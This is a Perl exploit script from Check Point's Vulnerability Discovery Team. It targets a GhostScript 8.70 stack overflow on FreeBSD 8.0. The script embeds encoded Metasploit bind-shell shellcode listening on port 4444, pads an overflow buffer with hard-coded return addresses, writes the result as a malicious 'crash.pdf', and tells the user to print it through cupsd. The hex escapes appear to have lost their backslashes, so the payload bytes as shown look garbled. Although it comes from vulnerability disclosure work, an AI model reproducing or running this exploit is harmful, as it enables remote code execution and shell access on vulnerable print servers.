##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>		 #
#									 #
# GhostScript Stack Overflow 						 #
#									 #	
##########################################################################

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
my $buf = 
"x54x5axdaxd1xd9x72xf4x5ax4ax4ax4ax4ax4ax43" .
"x43x43x43x43x43x52x59x56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x50x31x49x50" .
"x46x30x45x38x4bx4fx44x42x42x31x51x4cx4dx59" .
"x4bx57x50x50x43x5ax45x51x42x4ax44x42x42x4a" .
"x44x50x4ex50x45x31x48x4dx4bx30x51x47x46x30" .
"x46x30x43x5ax45x38x51x48x48x4dx4bx30x4dx59" .
"x51x57x4ax4cx48x30x43x5ax48x4dx4dx50x4ex50" .
"x45x4ex48x4dx4dx50x50x50x50x50x43x5ax51x4a" .
"x50x58x48x4dx4dx50x4bx4fx50x4fx4ax44x43x49" .
"x4bx46x46x30x42x48x46x4fx46x4fx44x33x42x48" .
"x43x58x46x4fx43x52x45x39x42x4ex4bx39x4bx53" .
"x46x30x46x34x50x53x50x50x48x30x47x4bx48x4d" .
"x4dx50x41x41";

$pkt = "e!PS".
"A" x 500 . "00001111222233334444555556666777788889999aaa".
"x40xd9xbfxbf". #Shellcode Addr
"bccccddd".
"xefxbexbfxbf".
"ffff".
"xffxbf" x 100 .
"C" x (1200 - length($buf)) . $buf . "Z" x 100; 

print STDERR "Check Point Vulnerability Discovery Team (VDT)n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)n";

print STDERR "nCreating evil pdf ...";

open(F,">crash.pdf");

print F $pkt;

close(F);

print STDERR " d0ne!n";
print "Now print it via cupsd!n";